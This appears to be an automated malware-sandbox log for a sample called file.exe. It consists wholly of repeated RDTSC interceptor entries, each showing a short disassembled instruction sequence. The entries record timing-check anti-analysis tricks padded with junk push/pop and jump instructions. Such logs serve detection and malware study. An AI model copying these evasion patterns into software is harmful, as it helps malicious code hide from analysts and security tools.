Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE198A second address: FE1990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B26B second address: 106B271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B271 second address: 106B275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B275 second address: 106B285 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC85CDF02AAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B54F second address: 106B555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B555 second address: 106B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B6E7 second address: 106B6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85D338E30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106B885 second address: 106B8A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC85CDF02B2h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106BF68 second address: 106BF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106BF70 second address: 106BF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106BF74 second address: 106BFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC85D338E28h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jmp 00007FC85D338E35h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b jmp 00007FC85D338E39h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106BFB8 second address: 106BFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C241 second address: 106C248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C248 second address: 106C25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 106C25B second address: 106C26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 je 00007FC85D338E2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10738EF second address: 10738FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02AAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10738FF second address: 1073937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Ah 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007FC85D338E70h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FC85D338E26h 0x0000001b jmp 00007FC85D338E38h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEECC0 second address: FEECD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEECD4 second address: FEED06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FC85D338E26h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC85D338E31h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC85D338E2Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEED06 second address: FEED0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEED0A second address: FEED10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FEED10 second address: FEED16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDE50E second address: FDE512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078BB3 second address: 1078BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FC85CDF02ABh 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078D07 second address: 1078D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078D0F second address: 1078D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FC85CDF02AFh 0x0000000f je 00007FC85CDF02A6h 0x00000015 jg 00007FC85CDF02A6h 0x0000001b popad 0x0000001c jne 00007FC85CDF02B6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025A27 second address: 1025A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025A2B second address: 1025A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FC85CDF02B3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025A4B second address: 1025A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025B31 second address: 1025B36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025B36 second address: 1025B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025B43 second address: 1025B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1025B47 second address: 1025B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1078FCB second address: 1078FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1079A97 second address: 1079A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1079A9B second address: 1079AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC85CDF02B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1079AB2 second address: 1079AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1079AB8 second address: 1079ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1079ABE second address: 1079AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107CD11 second address: 107CD17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107CD17 second address: 107CD21 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC85D338E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C3A5 second address: 107C3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC85CDF02A6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC85CDF02B1h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C4E8 second address: 107C4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C675 second address: 107C686 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC85CDF02A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C686 second address: 107C68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C9BF second address: 107C9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B5h 0x00000007 jmp 00007FC85CDF02B6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FC85CDF02A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107C9FC second address: 107CA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107CA00 second address: 107CA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FF17 second address: 107FF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 107FF1B second address: 107FF3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FC85CDF02ACh 0x0000000f jne 00007FC85CDF02A6h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10804B9 second address: 10804BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10804BD second address: 10804C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089761 second address: 1089785 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC85D338E3Fh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089785 second address: 1089796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1087695 second address: 10876B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10876B2 second address: 10876D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10876D1 second address: 10876D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10876D5 second address: 10876DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108786F second address: 1087898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC85D338E39h 0x0000000d jns 00007FC85D338E26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1087A1F second address: 1087A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1087A23 second address: 1087A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC85D338E38h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1087A46 second address: 1087A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FC85CDF02B4h 0x0000000f js 00007FC85CDF02A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1087A6C second address: 1087A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10882B4 second address: 10882BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1088529 second address: 108854B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jg 00007FC85D338E26h 0x0000000c pop edi 0x0000000d jmp 00007FC85D338E32h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108854B second address: 1088564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jg 00007FC85CDF02AAh 0x0000000d jnp 00007FC85CDF02AEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1088E5D second address: 1088E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E31h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC85D338E34h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089428 second address: 1089432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC85CDF02A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089432 second address: 1089438 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089438 second address: 1089452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jnc 00007FC85CDF02A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007FC85CDF02AEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1089452 second address: 108945E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108945E second address: 108946D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 108946D second address: 1089477 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC85D338E2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FED26A second address: FED270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FED270 second address: FED276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1090BAC second address: 1090BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FE3429 second address: FE342D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109141D second address: 1091421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1099151 second address: 1099171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC85D338E40h 0x0000000f push eax 0x00000010 jp 00007FC85D338E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1099171 second address: 109917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007FC85CDF02ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109739A second address: 10973B5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85D338E2Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973B5 second address: 10973D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC85CDF02A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973D1 second address: 10973E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973E1 second address: 10973E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973E5 second address: 10973F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10973F6 second address: 109740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007FC85CDF02A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC85CDF02A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109740B second address: 109740F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097559 second address: 1097583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FC85CDF02AFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC85CDF02B2h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097583 second address: 1097589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109794C second address: 109795C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85CDF02ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1097D78 second address: 1097D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC85D338E26h 0x0000000a jmp 00007FC85D338E30h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1098192 second address: 1098196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1098196 second address: 10981AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC85D338E34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 109889E second address: 10988AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007FC85CDF02A6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1096ED1 second address: 1096EF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC85D338E2Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FC85D338E2Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A028F second address: 10A0295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A0295 second address: 10A02B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E2Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FC85D338E26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A02B0 second address: 10A02B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10A02B4 second address: 10A02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
